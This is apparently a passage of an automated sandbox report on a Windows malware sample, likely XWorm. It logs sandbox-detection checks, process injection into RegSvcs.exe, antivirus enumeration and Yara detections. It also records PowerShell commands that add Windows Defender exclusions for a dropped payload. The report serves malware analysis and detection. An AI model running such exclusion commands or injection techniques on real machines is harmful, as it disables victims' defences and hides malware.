Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59874
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59641
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59532
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59407
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59297
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59187
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59078
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 58969
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 58860
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 58735
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 58614
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 58485
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 58360
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 58235
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 1199985
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 1199875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59671
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59453
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59343
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59546
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59891
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59563
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 59438
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: RegSvcs.exe, 00000003.00000002.3413577503.000001E3D1AD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWfigu%SystemRoot%\system32\mswsock.dllcKeyToken=b03f5f7f11d50a3a"
Source: btjxg.exe, 00000004.00000002.3366251779.000000000136E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: btjxg.exe, 00000004.00000002.3388814639.000000001BDF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Thread register set: target process: 348
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140000000
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140002000
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 1400A0000
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 5B53DFA010
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\btjxg.exe "C:\Users\user\AppData\Local\Temp\btjxg.exe"
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Queries volume information: C:\Users\user\Desktop\9NBx4Vmiuj.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Queries volume information: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Queries volume information: C:\Users\user\AppData\Local\Temp\btjxg.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: btjxg.exe, 00000004.00000002.3366251779.0000000001312000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: btjxg.exe PID: 1784, type: MEMORYSTR
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 348, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\btjxg.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: btjxg.exe PID: 1784, type: MEMORYSTR
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 348, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\btjxg.exe, type: DROPPED